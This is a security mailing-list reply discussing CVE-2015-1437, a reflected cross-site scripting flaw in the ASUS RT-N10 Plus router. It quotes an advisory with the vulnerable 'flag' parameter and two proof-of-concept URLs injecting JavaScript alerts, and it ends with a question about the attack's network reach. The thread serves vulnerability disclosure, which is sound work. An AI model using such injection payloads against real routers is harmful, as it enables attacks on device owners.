Re: CVE-2015-1437 XSS In ASUS Router.

From: Darko Vršič (darkovarnost.si)
Date: Wed Feb 04 2015 - 08:44:38 CST


On 02/04/2015 02:44 PM, Michael Meyer wrote:
> *** kingkaustubhme.com wrote:
>> #####################################
>> Title:- Reflected XSS vulnerability in Asus RT-N10 Plus router
>> Author: Kaustubh G. Padwad
>> Product: ASUS Router RT-N10 Plus
>> Firmware: 2.1.1.1.70
>> Severity: HIGH
>> Auth: Not required
>> CVE ID: CVE-2015-1437
>> # Description:
>> Vulnerable Parameter: flag=
>> # Vulnerability Class:
>> Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
> [...]
>
>> Enter this URL
>> 1.http://router/error_page.htm?flag=initial78846%27%3balert(document.lastmodified)%2f%2f372137b5d
>> 2.http://router/error_page.htm?flag=initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d
> https://sintonen.fi/advisories/asus-router-auth-bypass.txt
>
> Micha

So it's only vulnerable if WEB access is open to the internet, or
the attacker is in the LAN?

Darko